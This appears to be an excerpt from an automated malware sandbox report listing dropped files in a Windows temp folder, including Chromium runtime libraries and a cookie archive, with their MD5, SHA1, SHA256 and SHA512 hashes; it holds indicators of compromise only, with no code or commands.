SHA512 7cd1493e59e87c70927e66769eb200f79a57e1eb1223af4eb4064088571893d3e32cbc4b5ece568fd308992aad65684aa280dc9834f2b5d327bdee514b046e5e

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\chrome_100_percent.pak

MD5 06baf0ad34e0231bd76651203dba8326
SHA1 a5f99ecdcc06dec9d7f9ce0a8c66e46969117391
SHA256 5ae14147992a92548bcad76867dd88cdfcdb69d951c8720920cce6fb135e3189
SHA512 aff6616e56781ebb925a0ca146245ad3b2827250b32261c0c7c0d5b10b20a343a17fc3761c95d93104163e77b2eae3f1f9cbd3cb2b377f49b42bea39bdd09b91

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\Admincookies.zip

MD5 76cdb2bad9582d23c1f6f4d868218d6c
SHA1 b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA512 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

memory/1112-560-0x00007FFA2B540000-0x00007FFA2B541000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\D3DCompiler_47.dll

MD5 7641e39b7da4077084d2afe7c31032e0
SHA1 2256644f69435ff2fee76deb04d918083960d1eb
SHA256 44422e6936dc72b7ac5ed16bb8bcae164b7554513e52efb66a3e942cec328a47
SHA512 8010e1cb17fa18bbf72d8344e1d63ded7cef7be6e7c13434fa6d8e22ce1d58a4d426959bdcb031502d4b145e29cb111af929fcbc66001111fbc6d7a19e8800a5

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\libGLESv2.dll

MD5 bc45db0195aa369cc3c572e4e9eefc7e
SHA1 b880ca4933656be52f027028af5ef8a3b7e07e97
SHA256 a81729fd6ee2d64dfc47501a1d53794cdeee5c1daa3751f7554aea2503686d10
SHA512 dd8c39947e7d767fbdccf90c5b3eaedf3937b43c55200d2199107333b63ac09e5356c286618874fac841e1357dd927e0c70b5066c1feeedd8cc6c0fba605ee5f

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\libegl.dll

MD5 660a9ae1282e6205fc0a51e64470eb5b
SHA1 f91a9c9559f51a8f33a552f0145ed9e706909de8
SHA256 f2a841b6ef320f226965c7cb01fbc4709fc31425e490a3edfa20147ce3656c85
SHA512 20bed2bed042033e3d8b077f9d66bce67922aaec180cc3777f20560219226b7efc73932bb87445afda4e3877472ddcd307215d23954cd082051437e5f2224263